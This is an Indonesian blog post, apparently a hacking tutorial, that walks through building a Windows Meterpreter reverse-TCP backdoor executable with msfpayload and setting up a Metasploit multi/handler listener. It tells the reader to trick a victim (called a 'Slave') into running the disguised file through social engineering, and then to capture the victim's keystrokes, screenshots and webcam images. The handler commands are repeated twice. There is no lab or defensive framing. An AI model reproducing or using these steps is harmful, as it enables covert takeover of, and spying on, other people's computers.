Sebelum kita jalankan Metasploit, kita perlu menciptakan muatan untuk mendapatkan shell meterpreter. Untuk membuat jenis payload ini di terminal
Code:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
Saya menggunakan Port 4444 (Anda dapat memilih port Anda sendiri) untuk LPORT yang mendengarkan port dan mengatur LHOST ke IP penyerang jarak jauh yang jelas alamat IP lokal Anda, IP saya adalah 192.168.10.5.
Setelah itu, Anda harus dapat melihat file bernama sebagai backdoor.exe di / root. Mengirim file ke Slave dengan menggunakan keterampilan Rekayasa Sosial Anda dan biarkan dia klik file tersebut. Anda dapat mengubah nama file sehingga tidak jelas.
Peluncuran Metasploit dan mengatur exploit dengan mengetikkan perintah ini di msfconsole Anda:
Peluncuran Metasploit dan mengatur exploit dengan mengetikkan perintah ini di msfconsole Anda:
Code:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit
Jika semua berjalan dengan baik, Anda harus dapat membuat sesi meterpreter. Ketik sysinfo untuk mengumpulkan beberapa info pada mesin. Untuk mengetahui perintah lain untuk meterpreter jenis bantuan. Ada juga perintah meterpreter lain seperti menangkap screenshot dari PC, merekam keystrokes, menangkap snapshot dari webcam, dll Untuk memasukkan perintah shell dari mesin, tipe shell.
Terima kasih! Atas Suhu
0 komentar:
Posting Komentar